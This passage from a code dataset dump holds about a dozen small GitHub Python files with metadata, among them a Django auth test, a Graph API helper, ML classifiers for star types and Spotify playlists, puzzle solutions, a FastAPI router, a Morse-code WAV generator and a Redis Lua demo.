output_images_folder)\n","repo_name":"k-sandhu/Car-ND-Project5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22422160405","text":"import json\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework.test import APIClient\n\nfrom .constants import TEST_EMAIL\nfrom .constants import TEST_FIRSTNAME\nfrom .constants import TEST_LASTNAME\n\n\nclass TestAuthenticate(TestCase):\n    AUTHENTICATE_URL = reverse(\"authenticate\")\n    FIRST_NAME = 
TEST_FIRSTNAME\n LAST_NAME = TEST_LASTNAME\n EMAIL = TEST_EMAIL\n\n def setUp(self):\n self.client = APIClient()\n\n def test_create_user_and_login(\n self,\n first_name=FIRST_NAME,\n last_name=LAST_NAME,\n email=EMAIL,\n ):\n \"\"\"Checks if user is successfully created and auth token is returned.\"\"\"\n data = {\n \"sub\": \"googleID\",\n \"given_name\": first_name,\n \"family_name\": last_name,\n \"email\": email,\n }\n response = self.client.post(self.AUTHENTICATE_URL, data)\n self.assertEqual(response.status_code, 201)\n token = json.loads(response.content)[\"access_token\"]\n self.assertIsNotNone(token)\n","repo_name":"cuappdev/scoop-backend","sub_path":"src/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2155966650","text":"from Credentials import *\nimport requests\nimport json\n\ndef getCredentials() :\n\t\n\tcreds = dict()\n\tcreds['access_token'] = ACCESS_TOKEN\n\tcreds['client_id'] = CLIENT_ID \n\tcreds['client_secret'] = CLIENT_SECRET \n\tcreds['graph_domain'] = 'https://graph.facebook.com/' \n\tcreds['graph_version'] = 'v7.0' \n\tcreds['endpoint_base'] = creds['graph_domain'] + creds['graph_version'] + '/' \n\tcreds['debug'] = 'no'\n\tcreds['page_id'] = PAGE_ID\n\tcreds['instagram_account_id'] = INSTAGRAM_ACCOUNT_ID \n\tcreds['ig_username'] = IG_USERNAME \n\tprint(creds)\n\treturn creds\n\ndef callAPI( url, endpointParams, debug = 'no' ):\n\tdata = requests.get( url, endpointParams )\n\tresponse = dict() \n\tresponse['url'] = url \n\tresponse['endpoint_params'] = endpointParams \n\tresponse['endpoint_params_pretty'] = json.dumps( endpointParams, indent = 5) \n\tresponse['json_data'] = json.loads( data.content ) \n\tresponse['json_data_pretty'] = json.dumps( response['json_data'], indent = 5 ) \n\n\tif (debug=='yes') : \n\t\tdisplayData( response ) \n\n\treturn response \n\ndef displayData( response ) :\n\tprint (\"\\nURL: \" )# title\n\tprint (response['url']) # display url hit\n\tprint (\"\\nEndpoint Params: \") # title\n\tprint (response['endpoint_params_pretty']) # display params passed to the endpoint\n\tprint (\"\\nResponse: \") # title\n\tprint (response['json_data_pretty']) # make look pretty for cli","repo_name":"devaki9/NLP","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31434814414","text":"from google_images_download import google_images_download \nresponse = google_images_download.googleimagesdownload() \n\n# Set the Dwonload meta data\nlistKey = ['sofa', \n 'mattress',\n 'bed',\n 'table',\n 'Broken toilet',\n 'Gravel block',\n 'Broken brick',\n 'Waste mortar',\n 'refrigerator',\n 'washing machine',\n 'air conditioning',\n 'TV set',\n 'Mobile phone',\n 'Laptop',\n 'Rice cooker']\n\n#Start downloading\nfor item in listKey:\n print(item)\n #arguments = {\"keywords\":item,\"limit\":2,\"px\":\"proxyhk.huawei.com:8080\"}\n arguments = {\"keywords\":item,\"limit\":200,\"chromedriver\":\"C:\\Chromdriver\\chromedriver.exe\",\"output_directory\":\"./Misc garbage\"}\n response.download(arguments)\n\n","repo_name":"robbynie/GarbageClassification","sub_path":"GarbageClassification/爬虫_&_Tag/download_images - Misc.py","file_name":"download_images - Misc.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
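
The google_images_download record above drives one search per keyword but lets any scraper failure abort the whole batch. Here is a sketch of the same loop hardened with per-keyword error handling; it assumes only the response.download(arguments) call shown in that record, and the logging setup is an addition:

import logging

from google_images_download import google_images_download

logging.basicConfig(level=logging.INFO)
response = google_images_download.googleimagesdownload()

# Subset of the keyword list used in the record above.
list_key = ['sofa', 'mattress', 'bed', 'refrigerator']

for item in list_key:
    arguments = {"keywords": item, "limit": 200,
                 "chromedriver": "C:\\Chromdriver\\chromedriver.exe",  # machine-specific path from the record
                 "output_directory": "./Misc garbage"}
    try:
        response.download(arguments)
    except Exception:
        # A blocked search or network hiccup for one keyword should not stop the rest.
        logging.exception("Download failed for keyword %r", item)
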
+{"seq_id":"43467082134","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 20 14:47:10 2021\r\n\r\n@author: USER\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import matthews_corrcoef\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.metrics import f1_score\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import cross_val_score\r\nimport statistics\r\nfrom sklearn import svm\r\n#################################################################################################################################\r\n## PREPROCESAMIENTO\r\nstars_dataframe = pd.read_csv(\"stars.csv\")\r\n\r\n################################################\r\n## CARACTERISTICS\r\n\r\n#Temperature in Kelvin\r\nTemp = stars_dataframe['Temperature']\r\n\r\n#Relative Luminosity\r\nL = stars_dataframe['L']\r\n\r\n#Relative Radius\r\nR = stars_dataframe['R']\r\n\r\n#Absolute Magnitude\r\nAM = stars_dataframe['A_M']\r\n\r\n#General Obs. Color\r\n## Replace string to numbers/ 11 colors\r\nColors = stars_dataframe['Color']\r\nColor = Colors.str.upper().str.replace(\"-\",\" \")\r\nColor = Color.str.replace(\"WHITE YELLOW\",\"YELLOW WHITE\")\r\nAll_colors= Color.drop_duplicates().tolist() ## Se ve que hay 11 \r\ni=0\r\nfor x in All_colors:\r\n Color=Color.replace(x,i)\r\n i+=1\r\n\r\n#SMASS Spec.\r\n## Replace string to numbers/ 7 types\r\nSpec = stars_dataframe['Spectral_Class']\r\nSpec = Spec.str.upper()\r\nAll_Spec= Spec.drop_duplicates().tolist() ## Se ve que hay 7\r\ni=0\r\nfor x in All_Spec:\r\n Spec=Spec.replace(x,i)\r\n i+=1\r\n###############################################\r\n## LABELS\r\nTipos = stars_dataframe['Type']\r\n# Red Dwarf - 0\r\n#Brown Dwarf - 1\r\n#White Dwarf - 2\r\n#Main Sequence - 3\r\n#Super Giants - 4\r\n#Hyper Giants - 5\r\n################################################\r\n\r\n#Se guardan los datos limpios en csv\r\nstars_dataframe_clean = pd.concat([Temp,L,R,AM,Color,Spec,Tipos],axis=1)\r\nstars_dataframe_clean.to_csv('Stars_clean.csv', header=True, index=False)\r\nprint(stars_dataframe_clean)\r\n\r\n# SELECCION METODOS DE EVALUACION\r\nX_complete = stars_dataframe_clean.iloc[:,:-1].values\r\ny_complete = stars_dataframe_clean.iloc[:,-1].values\r\n\r\n# ## Se usaran los primeros 180 datos para entrenar \r\n# stars_train = stars_dataframe_clean.head(180)\r\n# X_train = stars_train.iloc[:,:-1].values\r\n# y_train = stars_train.iloc[:,-1].values\r\n\r\n# ## Se usaran los ultimos 60 datos para probar(10 tipo)\r\n# stars_test = stars_dataframe_clean.tail(60)\r\n# X_test = stars_test.iloc[:,:-1].values\r\n# y_test = stars_test.iloc[:,-1].values\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X_complete, y_complete, test_size=0.25, random_state=178)\r\n\r\n\r\n##################################################################################################################################\r\n\r\n## NORMALIZACION\r\nscaler = StandardScaler()\r\nscaler.fit(X_train)\r\nX_train = scaler.transform(X_train)\r\nX_test = scaler.transform(X_test)\r\n\r\n##################################################################################################################################\r\n\r\n## Representación y reducción dimensional 
\r\npca=PCA(n_components=3)\r\npca.fit(X_train)\r\nX_pca=pca.transform(X_train)\r\nX_pca_test=pca.transform(X_test)\r\nexpl =pca.explained_variance_ratio_\r\nmat_cov= pca.get_covariance()\r\nprint('\\n')\r\nprint(\"Matriz covarianza\",expl)\r\nprint('suma:',sum(expl[0:5]))\r\nprint('\\n')\r\n##Conservare 2 caracteristicas ya que con 2 la suma no disminuye mucho\r\n\r\n##################################################################################################################################\r\n\r\n## Entrenamiento Knn\r\nk_range = range(1, int(np.sqrt(len(y_train))))\r\ndis=['manhattan','chebyshev', 'minkowski']\r\n\r\nMCC=[]\r\nF1=[]\r\ndistancia=[]\r\nki=[]\r\nfor i in dis:\r\n for k in k_range:#Se varia k \r\n knn = KNeighborsClassifier(n_neighbors = k,weights='distance',metric=i, metric_params=None,algorithm='brute')\r\n knn.fit(X_train, y_train)\r\n y_pred=knn.predict(X_test)\r\n ## Metricas \r\n MCC.append(matthews_corrcoef(y_test,y_pred))\r\n F1.append(f1_score(y_test,y_pred,average='micro'))\r\n distancia.append(i)\r\n ki.append(k)\r\n\r\n## Metricas de evaluacion \r\nprint(\"########################################################################\"+\"\\n\")\r\nmaximo_MCC = MCC.index(max(MCC))\r\nprint(\"Con knn: Segun MCC({}) el mejor k es {} y la distancia es {}:\".format(max(MCC),ki[maximo_MCC],distancia[maximo_MCC]))\r\nmaximo_F1 = F1.index(max(F1))\r\nprint(\"Con knn: Segun F1({}) el mejor k es {} y la distancia es {}:\".format(max(F1),ki[maximo_F1],distancia[maximo_F1]))\r\n#print(classification_report(y_test, y_pred))\r\n\r\n##################################################################################################################################\r\n\r\nMCC=[]\r\nF1=[]\r\ndistancia=[]\r\nki=[]\r\n## Entrenamiento con PCA knn \r\nfor i in dis:\r\n for k in k_range:#Se varia k \r\n knn = KNeighborsClassifier(n_neighbors = k,weights='distance',metric=i, metric_params=None,algorithm='brute')\r\n knn.fit(X_pca, y_train)\r\n y_pred=knn.predict(X_pca_test)\r\n ## Metricas \r\n MCC.append(matthews_corrcoef(y_test,y_pred))\r\n F1.append(f1_score(y_test,y_pred,average='micro'))\r\n distancia.append(i)\r\n ki.append(k)\r\n\r\n## Metricas de evaluacion \r\nprint(\"\\n\"+\"########################################################################\"+\"\\n\")\r\nmaximo_MCC = MCC.index(max(MCC))\r\nprint(\"Con knn: Segun MCC({}) y PCA(2 componentes) el mejor k es {} y la distancia es {}:\".format(max(MCC),ki[maximo_MCC],distancia[maximo_MCC]))\r\nmaximo_F1 = F1.index(max(F1))\r\nprint(\"Con knn: Segun F1({}) y PCA(2 componentes) el mejor k es {} y la distancia es {}:\".format(max(F1),ki[maximo_F1],distancia[maximo_F1]))\r\n#print(classification_report(y_test, y_pred))\r\n\r\n\r\n##################################################################################################################################\r\n\r\n## Entrenamiento Logistic regresion\r\nprint(\"\\n\"+\"########################################################################\"+\"\\n\")\r\nDC=np.ones((len(X_train),1))\r\nDC_2= np.ones((len(X_test),1))\r\nX_train_lg = np.hstack((X_train,X_train**2,DC))\r\nX_test_lg = np.hstack((X_test,X_test**2,DC_2))\r\nclf = LogisticRegression(random_state=100, solver='liblinear', max_iter=100000000).fit(X_train_lg,y_train)\r\ny_predict_rg=clf.predict(X_test_lg)\r\nMCC_r=matthews_corrcoef(y_test,y_predict_rg)\r\nF1_r=f1_score(y_test,y_predict_rg,average='micro')\r\nprint(\"Con regresión logistica y una hipotesis X+X^2+1: el MCC es: \", MCC_r)\r\nprint(\"Con regresión logistica y 
una hipotesis X+X^2+1: el F1 es: \", F1_r)\r\n#print(classification_report(y_test, y_predict))\r\n\r\n##################################################################################################################################\r\n## Entrenamiento Logistic regresion y PCA\r\nprint(\"\\n\"+\"########################################################################\"+\"\\n\")\r\nDC=np.ones((len(X_pca),1))\r\nDC_2= np.ones((len(X_pca_test),1))\r\nX_train_lg = np.hstack((X_pca,X_pca**2,DC))\r\nX_test_lg = np.hstack((X_pca_test,X_pca_test**2,DC_2))\r\nclf = LogisticRegression(random_state=100, solver='liblinear', max_iter=100000000).fit(X_train_lg,y_train)\r\ny_predict=clf.predict(X_test_lg)\r\nMCC_r=matthews_corrcoef(y_test,y_predict)\r\nF1_r=f1_score(y_test,y_predict,average='micro')\r\nprint(\"Con regresión logistica, una hipotesis X+X^2+1 y PCA(2 componentes) : el MCC es: \", MCC_r)\r\nprint(\"Con regresión logistica, una hipotesis X+X^2+1 y PCA(2 componentes) : el F1 es: \", F1_r)\r\n#print(classification_report(y_test, y_predict))\r\n\r\n\r\n##################################################################################################################################\r\nprint(\"\\n\"+\"########################################################################\"+\"\\n\")\r\n#print(\"Segun lo analizado el mejor resultado se vio con regresión logistica sin usar PCA\")\r\n#print(classification_report(y_test, y_predict_rg))\r\n\r\n\r\n##################################################################################################################################\r\n\r\nF1=[]\r\ndistancia=[]\r\nki=[]\r\nsc=[]\r\nMCC=[]\r\n\r\nfor i in dis:\r\n for k in k_range:#Se varia k \r\n knn = KNeighborsClassifier(n_neighbors = k,weights='distance',metric=i, metric_params=None,algorithm='brute')\r\n scores = cross_val_score(knn, X_complete, y_complete, cv=5,scoring='f1_micro')\r\n mean = statistics.mean(scores)\r\n ki.append(k)\r\n distancia.append(i)\r\n F1.append(mean)\r\n #scores = cross_val_score(knn, X_complete, y_complete, cv=5,scoring='mcc')\r\n ##MCC.append(mean)\r\n\r\n\r\n\r\nmaximo_F1 = F1.index(max(F1))\r\nprint(\"Con knn y cross validation: Segun el promedio de F1({}) el mejor k es {} y la distancia es {}:\".format(max(F1),ki[maximo_F1],distancia[maximo_F1]))\r\n\r\n##################################################################################################################################\r\n\r\nF1=[]\r\nki=[]\r\nsc=[]\r\nMCC=[]\r\n\r\n\r\n# for k in k_range:#Se varia k \r\n# clf = svm.SVC(kernel='linear', C=k, random_state=42)\r\n# scores = cross_val_score(clf, X_complete, y_complete, cv=5,scoring='f1_micro')\r\n# mean = statistics.mean(scores)\r\n# ki.append(k)\r\n# F1.append(mean)\r\n\r\n \r\nclf = svm.SVC(kernel='linear', C=1, random_state=42)\r\nscores = cross_val_score(clf, X_complete, y_complete, cv=5,scoring='f1_micro')\r\nmean = statistics.mean(scores)\r\nki.append(1)\r\nF1.append(mean)\r\n\r\nmaximo_F1 = F1.index(max(F1))\r\nprint(\"Con SVM linear y cross validation: Segun el promedio de F1({}) el mejor C es {}:\".format(max(F1),ki[maximo_F1]))\r\n\r\n\r\n\r\n\r\n","repo_name":"marinho14/Stars-and-Machine-Learning","sub_path":"Estrellas_clas.py","file_name":"Estrellas_clas.py","file_ext":"py","file_size_in_byte":9797,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2401413074","text":"class Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if len(nums) <= 2:\n return len(nums)\n ptr = 2\n for 
index in range(2, len(nums)):\n if nums[index] != nums[ptr-2]:\n nums[ptr] = nums[index]\n ptr += 1\n \n return ptr\n","repo_name":"SouradeepSaha/leetcode","sub_path":"80. Remove Duplicates from Sorted Array II.py","file_name":"80. Remove Duplicates from Sorted Array II.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23082404699","text":"#!/usr/bin/env python3\n\"\"\"\nCode used to solve Advent of Code 2015 Day 2 exercise 1\nAdvent of Code 2015, Day 02, Exercise 1\n# https://adventofcode.com/2015\n\"\"\"\n\nimport os\n\n\ndef total_surface_area_parcel_in_sq_feet(length, width, height):\n \"\"\"\n > Given a parcel's length, width, and height, return the total surface area of\n the parcel in square feet\n \n :param length: The length of the parcel in inches\n :param width: the width of the box, in inches\n :param height: The height of the parcel in inches\n :return: The slack and the surface area\n \"\"\"\n sorted_dimensions = [length, width, height]\n sorted_dimensions.sort()\n slack = sorted_dimensions[0] * sorted_dimensions[1]\n surface_area = (2 * length * width) + (2 * width * height) + (2 * length * height)\n\n return slack + surface_area\n\n\ndef total_wrapping_paper_in_sq_feet(file_name):\n \"\"\"\n It reads the file line by line, splits the line into three parts, converts the\n three parts into integers, and then passes the three integers to the function\n total_surface_area_parcel_in_sq_feet.\n\n The function total_surface_area_parcel_in_sq_feet returns the total surface\n area of the parcel in square feet.\n\n The function total_wrapping_paper_in_sq_feet adds the total surface area of the\n parcel to the total wrapping paper.\n\n The function total_wrapping_paper_in_sq_feet returns the total wrapping paper\n in square feet\n\n :param file_name: The name of the file that contains the dimensions of the\n parcels\n :return: The total wrapping paper in square feet.\n \"\"\"\n with open(file_name, \"r\", encoding=\"utf-8\") as file:\n total_wrapping_paper = 0\n while True:\n line = file.readline()\n if not line:\n break\n length = int(line.split(\"x\")[0])\n width = int(line.split(\"x\")[1])\n height = int(line.split(\"x\")[2]) \n total_wrapping_paper += total_surface_area_parcel_in_sq_feet(length, width, height) \n\n return total_wrapping_paper\n\n\ndef main():\n \"\"\"\n It takes a file name as input, reads the file, and returns the total amount of\n wrapping paper needed to wrap all the presents in the file\n \"\"\"\n os.system(\"cls || clear\")\n\n file_name_test_file = \"C:/source/repos/AdventOfCode/AOC_2015/Day_02/test_file.txt\"\n file_name_puzzle_file = \"C:/source/repos/AdventOfCode/AOC_2015/Day_02/puzzle_input_file.txt\"\n test_file_answer = total_wrapping_paper_in_sq_feet(file_name_test_file)\n puzzle_file_answer = total_wrapping_paper_in_sq_feet(file_name_puzzle_file)\n print(f\"test file: {test_file_answer}\")\n print(f\"puzzle file: {puzzle_file_answer}\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"LordFuture/AdventOfCode","sub_path":"AOC_2015/Day_02/ex_01.py","file_name":"ex_01.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31676723358","text":"\n## Este script se usará para leer y transformar el conjunto de datos\n\nimport numpy as np\nfrom df_to_class import read_playlist\nfrom sklearn.preprocessing import StandardScaler\nfrom 
sklearn.model_selection import train_test_split\n\ndanceability_index = 0 \nenergy_index = 1\nkey_index = 2\nloudness_index = 3\nmode_index = 4\nspeechiness_index = 5\nacousticness_index = 6 \ninstrumentalness_index = 7 \nliveness_index = 8\nvalence_index = 9\ntempo_index = 10 \nduration_ms_index = 11 \ntime_signature_index = 12\npopularity_track_index = 13 \npopularity_album_index = 14\npopularity_artist_index = 15\n\n## Selecciona solo los atributos que aparecen en la lista de columnas\n# @param columnas lista de nombres de columnas\n# @param cancion objeto track\n# @return una lista con los atributos seleccionados de esa canción\ndef proyeccion_unitaria(columnas, cancion):\n lista = []\n for c in columnas:\n lista.append(cancion.features[c])\n return lista\n\n## Obtiene un diccionario de artistas. Mapea el nombre de un artista con un número.\ndef get_dict_artist(playlists):\n dict = {}\n indice = 1\n for pl in playlists:\n for song in pl.tracks:\n if not (song.artist_name in dict.keys()):\n dict[song.artist_name] = float(indice)\n indice += 1\n return dict\n\n## recibe una lista de playlists y devuelve dos arreglos, X y y.\ndef transforma_playlist(cs, playlists):\n X_list = []\n y_list = []\n for pl in playlists:\n for song in pl.tracks:\n X_list.append(proyeccion_unitaria(cs, song))\n y_list.append(pl.id)\n return (np.array(X_list), np.array(y_list))\n\n## Reescala el conjunto de datos X.\ndef reescala(X):\n scaler = StandardScaler().fit(X)\n return scaler.transform(X)\n\ndef ms_a_minutos(X_in):\n X_in[:,duration_ms_index] = (X_in[:,duration_ms_index] / 1000) / 60\n\n## Obtiene una combinación lineal de las popularidades.\n# @return la concatenación de X_in con la nueva columna de popularidad\ndef popularidad(X_in):\n track = X_in[:,popularity_track_index]\n artist = X_in[:,popularity_artist_index]\n album = X_in[:,popularity_album_index]\n popularity = np.zeros((track.shape))\n popularity = 3*track + 2*artist + album\n popularity_column = popularity[:,np.newaxis]\n return np.concatenate([X_in, popularity_column], axis=1)\n\ndef calcula_popularidad_index(X_in):\n I = np.zeros((X_in.shape[0], 1))\n I = 3*X_in[:, popularity_track_index] + 2*X_in[:, popularity_artist_index] + X_in[:, popularity_album_index]\n X_in = np.concatenate((X_in, I.reshape(-1,1)), axis=1)\n return X_in\n\ndef normaliza(X_in):\n # Columnas que si se deben normalizar\n indexes = [c for c in range(0,16) if c != loudness_index and c != duration_ms_index]\n # Entrena y transforma usando solo las columnas\n transformer = StandardScaler().fit(X_in[:, indexes])\n XN = transformer.transform(X_in[:, indexes])\n # Concatenar las columnas transformadas con las 2 restantes\n XZ = np.concatenate((XN[:, [0,1,2]], X_in[:,loudness_index].reshape(-1,1)), axis=1)\n XZ = np.concatenate((XZ[:,:], XN[:,[3,4,5,6,7,8,9]]), axis=1)\n XZ = np.concatenate((XZ[:,:], X_in[:,duration_ms_index].reshape(-1,1)), axis=1)\n XZ = np.concatenate((XZ[:,:], XN[:,[10,11,12,13]]), axis=1)\n return transformer, XZ \n\ndef interesting(X_int):\n I = np.zeros((X_int.shape[0], 1))\n I = X_int[:, loudness_index] + X_int[:, tempo_index] + (X_int[:, energy_index]) * 100 + (X_int[:, danceability_index]) * 100 + (X_int[:, acousticness_index]) * 100 \n X_int = np.concatenate((X_int, I.reshape(-1,1)), axis=1)\n return X_int\n\ndef transforma_test(transformer, X_in):\n indexes = [c for c in range(0,16) if c != loudness_index and c != duration_ms_index]\n XTT = transformer.transform(X_in[:, indexes])\n XT = np.concatenate((XTT[:, [0,1,2]], 
X_in[:,loudness_index].reshape(-1,1)), axis=1)\n XT = np.concatenate((XT[:,:], XTT[:,[3,4,5,6,7,8,9]]), axis=1)\n XT = np.concatenate((XT[:,:], X_in[:,duration_ms_index].reshape(-1,1)), axis=1)\n XT = np.concatenate((XT[:,:], XTT[:,[10,11,12,13]]), axis=1)\n return XT\n\ndef preprocessing(x_train, x_test):\n ms_a_minutos(x_test)\n ms_a_minutos(x_train)\n transformer, x_train = normaliza(x_train)\n x_train = interesting(x_train)\n x_test = transforma_test(transformer, x_test)\n x_test = interesting(x_test)\n x_train = calcula_popularidad_index(x_train)\n x_test = calcula_popularidad_index(x_test)\n return x_train, x_test\n\n## Lee y obtiene el conjunto de datos en crudo\ndef obten():\n proy = ['danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness',\n 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo', \n 'duration_ms', 'time_signature', 'popularity_track', 'popularity_album', 'popularity_artist']\n playlist_set = read_playlist('dataset/mpd.slice.0-999-features-v2.json')\n return transforma_playlist(proy, playlist_set)\n\n## Devuelve los datos preprocesados\ndef obten2():\n X, y = obten()\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n X_train_pp, X_test_pp = preprocessing(X_train, X_test)\n return (np.concatenate([X_train_pp, X_test_pp], axis=0), np.concatenate([y_train, y_test], axis = 0))\n\ndef main():\n X, y = obten2()\n print('X.shape', X.shape)\n print('y.shape', y.shape)\n\n\n","repo_name":"rodrigofvc/music-recommendations-spotify","sub_path":"src/read_ds.py","file_name":"read_ds.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11707212395","text":"from fastapi import APIRouter, Depends, HTTPException, Request\nfrom dbsession import DBSession\nfrom deps import get_db\n\nrouter = APIRouter()\n\n\n@router.get(\"/users/\", tags=[\"users\"])\nasync def read_users(request: Request):\n version = await request.app.state.db.version()\n\n return {\n \"db\": version,\n \"users\": [\n {\n \"username\": \"Rick\"\n },\n {\n \"username\": \"Morty\"\n }\n ]\n }\n\n\n@router.get(\"/users/me\", tags=[\"users\"])\nasync def read_user_me(request: Request):\n return {\"username\": \"fakecurrentuser\"}\n\n\n@router.get(\"/users/{username}\", tags=[\"users\"])\nasync def read_user(request: Request, username: str):\n data = await request.app.state.db.get_user(username)\n if not data:\n raise HTTPException(status_code=422, detail=\"Item not found\")\n # return {\"error\": \"that users does not exist in the db\"}\n return data\n\n\n@router.post(\"/users/\")\nasync def create_user(request: Request):\n data = await request.json()\n await request.app.state.db.add_user(data)\n return data\n","repo_name":"datajango/python-meetup-group-2022-10-12","sub_path":"backend04/routers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11316699785","text":"import wave\r\nimport random\r\nimport struct\r\nimport time\r\nimport winsound\r\nimport math\r\nimport sys\r\n\r\n\r\ndef makeWave(length, freq = 1000, amplitude = 1):\r\n\ttemp = []\r\n\tfor i in range(length):\r\n\t\tramp = 1-2**(-.01*(length-i-1))-2**(-.01*i)\r\n\t\tvalue = int(ramp*amplitude*2**15*math.sin(i*freq*2*math.pi/44100))\r\n\t\tpacked_value = struct.pack('h', value)\r\n\t\ttemp.append(packed_value)\r\n\treturn b''.join(temp)\r\n\r\n\r\ndef 
makeMorse(letter, morse_dict, speed = 1):\r\n\tmorse = []\r\n\tfor digit in morse_dict[letter]:\r\n\t\tif digit == '1':\r\n\t\t\tmorse.append(makeWave(int(20000/speed), 880))\r\n\t\telif digit == '2':\r\n\t\t\tmorse.append(makeWave(int(40000/speed), 880))\r\n\t\telse:\r\n\t\t\tmorse.append(makeWave(int(20000/speed), 880, 0))\r\n\t\tmorse.append(makeWave(int(20000/speed), 880, 0))\r\n\treturn b''.join(morse)\r\n\r\n\r\ndef restartLine():\r\n    sys.stdout.write('\\r')\r\n    sys.stdout.flush()\r\n\r\n\r\nmorse_dict = {'!': '000', '?': '000', '\\n': '00000', ' ': '00', '.': '000', ',': '0', 'a': '12', 'b': '2111', 'c': '2121', 'd': '211', 'e': '1', 'f': '1121', 'g': '221', 'h': '1111', 'i': '11', 'j': '1222', 'k': '212', 'l': '1211', 'm': '22', 'n': '21', 'o': '222', 'p': '1221', 'q': '2212', 'r': '121', 's': '111', 't': '2', 'u': '112', 'v': '1112', 'w': '122', 'x': '2112', 'y': '2122', 'z': '2211', '1': '12222', '2': '11222', '3': '11122', '4': '11112', '5': '11111', '6': '21111', '7': '22111', '8': '22211', '9': '22221', '0': '22222'}\r\n\r\n#inp = []\r\ns=''\r\ntry:\r\n\twhile True:\r\n\t\ts += '\\n' + str(input())\r\n\t\t#inp.append(s)\r\nexcept:\r\n\tpass\r\n\r\ninput_string = s\r\n#input_string = str(input('Text: '))\r\n#speed = float(input('Speed: '))\r\nspeed = 5\r\n\r\n# Monotonic timer for the elapsed-time report (time.clock was removed in Python 3.8).\r\nt0 = time.perf_counter()\r\n\r\noutput = wave.open('morsefile.wav', 'w')\r\noutput.setparams((2, 2, 44100, 0, 'NONE', 'compressed'))\r\n\r\nvalues = []\r\ncount = 0\r\nlength = len(input_string)\r\n\r\nprint('\\n Generating morse code...')\r\n\r\nfor letter in input_string:\r\n\ttry:\r\n\t\tvalues.append(makeMorse(letter.lower(), morse_dict, speed))\r\n\t\tvalues.append(makeWave(int(30000/speed), 0))\r\n\t\tcount += 1\r\n\t\trestartLine()\r\n\t\tsys.stdout.write(' |' + int(30*count/length)*'=' + (30-int(30*count/length))*' ' + '| ' + str(round(100*count/length)) + '%')\r\n\t\tsys.stdout.flush()\r\n\texcept KeyError:\r\n\t\tpass\r\n\r\n\r\nvalue_str = b''.join(values)\r\noutput.writeframes(value_str)\r\n\r\noutput.close() \r\n\r\nprint('\\n Complete! 
Elapsed time:', round(time.perf_counter()-t0, 3), 'seconds.')\r\nprint(' Playing generated morse code...')\r\n\r\nwinsound.PlaySound('morsefile.wav', winsound.SND_ASYNC | winsound.SND_FILENAME)\r\nduration = output.getnframes() / output.getframerate()\r\ntime.sleep(duration)\r\nprint(' Completed!')","repo_name":"maxbergmark/old-work","sub_path":"Egna projekt/morsewav.py","file_name":"morsewav.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27424564978","text":"from __future__ import print_function\nimport redis\n\n# Create connection to localhost Redis\nclient = redis.StrictRedis(host=\"localhost\", port=6379)\n\nuser = \"users:id:992452\"\nclient.set(user, '{\"name\": \"Tina\", \"sex\": \"female\", \"grade\": \"A\"}')\n\n# Read the lua scripts from file\nwith open(\"updateJson.lua\") as f:\n    lua = f.read()\n\n    #Create Redis Script instance\n    updateJson = client.register_script(lua)\n\n    #Invoke lua script using the script instance\n    updateJson(keys=[user], args=['{\"grade\": \"C\"}'])\n\n    print(client.get(user))\n\n\n\n\n\n","repo_name":"PacktPublishing/Redis-4.x-Cookbook","sub_path":"Chapter04/python/RedisLuaDemo.py","file_name":"RedisLuaDemo.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"} +{"seq_id":"2126610617","text":"from django import forms\nfrom .models import *\nfrom member.models import User as UserAb\n\n\nclass PetForm(forms.ModelForm):\n    class Meta:\n        model = Pet\n        fields = '__all__'\n        labels = {'pet_name':'펫이름', 'gender':'성별',\n                  'size':'분류', 'neutered':'중성화', 'pet_img':'펫프사'}\n\nclass UserAbForm(forms.ModelForm):\n    class Meta:\n        model = UserAb\n        fields = ['username', 'first_name', 'email', 'profile_img', 'user_ph', 'last_name']\n        labels = {'username' : 'ID', 'first_name' : '이름', 'email':'email', 'profile_img' : '프로필 사진', 'user_ph':'연락처', 'last_name' : '주소'}","repo_name":"Jinnny-An/Pet-Dada","sub_path":"mypageapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72948101633","text":"import numpy as np\nfrom hashlib import 